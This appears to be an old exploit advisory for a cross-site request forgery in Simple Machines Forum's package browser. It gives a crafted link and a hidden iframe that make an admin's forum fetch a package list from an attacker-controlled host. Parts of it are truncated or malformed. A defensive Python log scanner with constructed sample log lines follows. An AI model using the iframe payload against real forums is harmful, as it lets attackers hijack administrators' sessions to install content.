Vulnerable Version: All
The bug is located in the file: Sources/PackageGet.php
Example:
http://victm.com/index.php?action=pa...//attacker.com
When the admin follows the link, SMF loads the file:
http://attacker.com/packages.xml
Save this file as packages.xml
<?xml version="1.0"?>
<!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list">
< xmlns="http://www.simplemachines.org/xml/package-list" smf="http://www.simplemachines.org/">
and generate the XSRF:
< iframe src="http://victim.com/index.php?action=packageget;sa=browse;absolute=htt%20p://attacker.com" scrolling="no" width="0%">
# milw0rm.com [2009-01-26]
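
A defender-side check for the request pattern in this advisory, as an added example (not part of the original advisory or of SMF's code): it scans web access logs for action=packageget requests whose absolute parameter names a package server outside an allowlist, and records whether the Referer came from the forum itself. The host names, the allowlist and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumptions (constructed values): the forum's own host and the package
# servers its admins legitimately browse.
FORUM_HOST = "forum.example.org"
ALLOWED_PACKAGE_HOSTS = {"packages.example.org"}

# Request target and Referer from a combined-format access log line.
LOG_RE = re.compile(
    r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+" \d{3} \S+ "(?P<referer>[^"]*)"')

def smf_params(target):
    """Parse an SMF query string, which separates pairs with ';' as well as '&'."""
    params = {}
    for pair in re.split(r"[;&]", urlsplit(target).query):
        key, _, value = pair.partition("=")
        if key:
            params[unquote(key).lower()] = unquote(value)
    return params

def check_line(line):
    """Return a finding dict for a suspicious packageget request, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    params = smf_params(m["target"])
    if params.get("action") != "packageget" or "absolute" not in params:
        return None
    # The PoC on this page writes the scheme as "htt%20p"; drop whitespace
    # so that form is normalised before the host is extracted.
    server = re.sub(r"\s+", "", params["absolute"])
    if (urlsplit(server).hostname or "") in ALLOWED_PACKAGE_HOSTS:
        return None
    referer_host = urlsplit(m["referer"]).hostname
    return {"package_server": server,
            "referer_from_forum": referer_host == FORUM_HOST}

def scan(lines):
    return [f for f in map(check_line, lines) if f]

# Constructed sample log lines.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Jan/2009:10:00:00 +0000] "GET /index.php?action=packageget;sa=browse;absolute=htt%20p://attacker.example HTTP/1.1" 200 512 "http://blog.example.net/post" "Mozilla/5.0"',
    '203.0.113.7 - - [26/Jan/2009:10:05:00 +0000] "GET /index.php?action=packageget;sa=browse;absolute=http://packages.example.org HTTP/1.1" 200 900 "http://forum.example.org/index.php?action=admin" "Mozilla/5.0"',
    '198.51.100.4 - - [26/Jan/2009:10:06:00 +0000] "GET /index.php?action=profile;u=1 HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with referer_from_forum set to False is the case the advisory describes: the admin's browser was sent to the package browser from another site.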